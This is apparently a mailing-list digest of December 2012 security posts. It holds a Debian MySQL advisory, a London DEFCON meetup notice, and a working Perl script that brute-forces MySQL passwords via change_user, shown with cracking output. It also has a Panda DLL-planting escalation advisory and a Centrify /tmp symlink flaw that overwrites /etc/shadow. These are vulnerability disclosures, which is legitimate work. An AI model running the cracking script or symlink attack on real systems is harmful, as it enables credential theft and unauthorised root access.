[SECURITY] [DSA 2581-1] mysql-5.1 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2581-1 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez December 04, 2012 http://www.debian.org/security/faq - - Package: mysql-5.1 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-3150 CVE-2012-3158 CVE-2012-3160 CVE-2012-3163 CVE-2012-3166 CVE-2012-3167 CVE-2012-3173 CVE-2012-3177 CVE-2012-3180 CVE-2012-3197 CVE-2012-5611 Debian Bug : 690778 695001 Several issues have been discovered in the MySQL database server. The vulnerabilities are addressed by upgrading MySQL to a new upstream version, 5.1.66, which includes additional changes, such as performance improvements and corrections for data loss defects. These changes are described in the MySQL release notes at: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html For the testing distribution (wheezy) and unstable distribution (sid), these problems have been fixed in version 5.5.28+dfsg-1. Additionally, CVE-2012-5611 has been fixed in this upload. The vulnerability (discovered independently by Tomas Hoger from the Red Hat Security Response Team and king cope) is a stack-based buffer overflow in acl_get() when checking user access to a database. Using a carefully crafted database name, an already authenticated MySQL user could make the server crash or even execute arbitrary code as the mysql system user. For the stable distribution (squeeze), this problem has been fixed in version 5.1.66-0+squeeze1. For the testing distribution (wheezy) and unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your mysql-5.1 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iQEcBAEBCgAGBQJQvZ/WAAoJEG3bU/KmdcClarEIAJ9nKbUELxjb1eksmEGOXkYr x2WM+6XPVAN+4JKwwFyXCNYJbTPG5J3EM090YguqfnoWvVHZaPbcciymDOyNwPh3 x9Dm7lBNla2/fPvgEsA8enGaQdIrHnOy13Lj4e4Mu/3g1nSBp0eGZIVT6TVy9BJO Hiqds0BZDqHuG/SGtWNsMLs6dMH4iYVcvcK3NFyFh6zt8O73Cbe0xIYDDuwO0uwj HoUk6WxK2qs7auir+XkAShdQAj7KjL7Zs3LmLPaH1oUKvRD/IYJw14NRkdeU8CC5 Jz9sdTICSYxYe11zITXYdF4UYRLpF7W8jW6WDPM5kkZWPTjtUkUB0jcdeFQP6v4= =D3mt -END PGP SIGNATURE-
DC4420 - London DEFCON - Christmas 2012 meet! Tuesday 11th December 2012
Hard to believe, but 2012 is almost over Once again we've managed to secure the venue for a December meet, so we can start the festivities well before your livers are too crippled by office parties... Not only that, but we've even got a speaker lined up! Chris from Facebook London's Site Integrity Engineering Team will be giving us: Why root the kernel when you can just install a toolbar? Chris will give a brief overview of the major attacks against Facebook and then deep dive on a trend towards browser malware that they really saw gain traction last year. ... and then we'll do some serious Christmas drinking! DOWNSTAIRS @ The Phoenix, Cavendish Square http://www.phoenixcavendishsquare.co.uk/ Talk starts at 19:30, but the venue is ours from much earlier... food is good and beer is cold! See you next week! cheers, MM p.s. if you have any potential talks for next year please email: mailto:ta...@dc4420.org?subject=DC4420%20Talk -- In DEFCON, we have no names... errr... well, we do... but silly ones...
MySQL Local/Remote FAST Account Password Cracking
FAST Cracking of MySQL account passwords locally or over the network (post-auth) (to the maintainers: you don't need to patch this, looks alot like a minor bug, prolly documented :D) I found a method to crack mysql user passwords locally or over the network pretty efficiently. During Tests it was possible to test 5000 passwords per second over the network. The method is as follows: The attacker logs into the mysql server with an unprivileged account. There is a command in mysql called change_user, this command can be used as the name suggests to change a user during a mysql session. Since mysql is very fast in doing this it is much more powerful to crack passwords rather than reconnecting every time to the mysql server to brute force passwords (what would be VERY slow). Since the SALT does not change (and this is the weak point) in the change_user command it is a convienent way to crack passwords. (When connecting to mysql in each connection attempt the SALT is always different and sent out by the server). Below is an example script and an example which uses John the Ripper's capabilities to generate passwords. The passwords pass for the user crackme is cracked in a matter of seconds. (about 10 passwords are tested in 20 seconds) --- cracking script use Net::MySQL; $|=1; my $mysql = Net::MySQL-new( hostname = '192.168.2.3', database = 'test', user = user, password = secret, debug = 0, ); $crackuser = crackme; while(stdin) { chomp; $currentpass = $_; $vv = join \0, $crackuser, \x14. Net::MySQL::Password-scramble( $currentpass, $mysql-{salt}, $mysql-{client_capabilities} ) . \0; if ($mysql-_execute_command(\x11, $vv) ne undef) { print [*] Cracked! -- $currentpass\n; exit; } } --- example session: C:\Users\kingcope\DesktopC:\Users\kingcope\Desktop\john179\run\jo hn --incremental --stdout=5 | perl mysqlcrack.pl Warning: MaxLen = 8 is too large for the current hash type, reduced to 5 words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH words: 24573 time: 0:00:00:04 w/s: 4916 current: rap words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3 words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429 words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141 words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2 [*] Cracked! -- pass words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs Session aborted Greetings, Kingcope
Privilege Escalation through Binary Planting in Panda Internet Security
Privilege Escalation through Binary Planting in Panda Internet Security Software: Panda Internet Security 2012 2013 Vendor: http://www.pandasecurity.com/ Vuln Type: Binary Planting Attack Remote: No Local: Yes Discovered by: QSecure and Demetris Papapetrou Website: http://www.qsecure.com.cy Discovered: 09/09/2012 Reported: 19/11/2012 Disclosed: 04/12/2012 Vendor's Response: Automatically Generated Email Vulnerability Reference: http://www.qsecure.com.cy/advisories/binary_planting_in_panda.html VULNERABILITY DESCRIPTION: == As a result of an incorrect dynamic link library (DLL) loading in Panda Internet Security, an attacker with user level access to the machine can elevate his/her privileges to SYSTEM. This can be accomplished by planting a malicious DLL file in a writable folder that is part of the system's %PATH% variable. The malicious DLL is loaded when the vulnerable Panda service or the system is restarted. The following DLLs are insecurely loaded by Panda Internet Security 2013: Insecure DLLVulnerable Service - -- Pavshld.dll PsCtrls.exe, PsImSvc.exe, PavFnSvr.exe, PskSvc.exe ImFilter.dll2 PsImSvc.exe ImFilter.dll3 PsImSvc.exe ImFilter.dll4 PsImSvc.exe In addition to the above DLLs, Panda Internet Security 2012 also loads ham.dll insecurely.
Centrify Deployment Manager v2.1.0.283
Centrify Deployment Manager v2.1.0.283 While at a training session for centrify, I noticed poor handling of files in /tmp. I was able to overwrite /etc/shadow with the contents of adcheckDMoutput. I am sure there are more vulnerabilities to be exploit, maybe a local root - but being this is a training class I should probably focus. total 6680 -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rw-rw-r-- 1 clyde clyde 188 Dec 3 14:41 centrify.cmd.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh drwx-- 2 root root 4096 Dec 3 10:25 vmware-root drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib [root@engnew-cen tmp]# ls -l total 6680 -rw-rw-rw- 1 root root 3999 Dec 3 14:41 adcheckDMoutput -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh drwx-- 2 root root 4096 Dec 3 10:25 vmware-root drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib [root@engnew-cen tmp]# ls -l total 6688 -rw-rw-rw- 1 root root 3999 Dec 3 14:41 adcheckDMoutput -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 clyde clyde 132 Dec 3 14:41 centrify.cmd.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh drwx-- 2 root root 4096 Dec 3 10:25 vmware-root drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib [root@engnew-cen tmp]# ls -l total 6672 -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh # ln -s /etc/shadow adcheckDMoutput After run: # ls -l /etc/shadow -r 1 root root 3999 Dec 3 14:56 /etc/shadow /etc/shadow has been overwritten with the contents of adcheckDMoutput. I am also assuming the .210 appended to the end of files in /tmp is the major version number. Larry W. Cashdollar @_larry0
Centrify Deployment Manager v2.1.0.283
This is actually the login UID of the user Deployment manager is being run as. Centrify Deployment Manager v2.1.0.283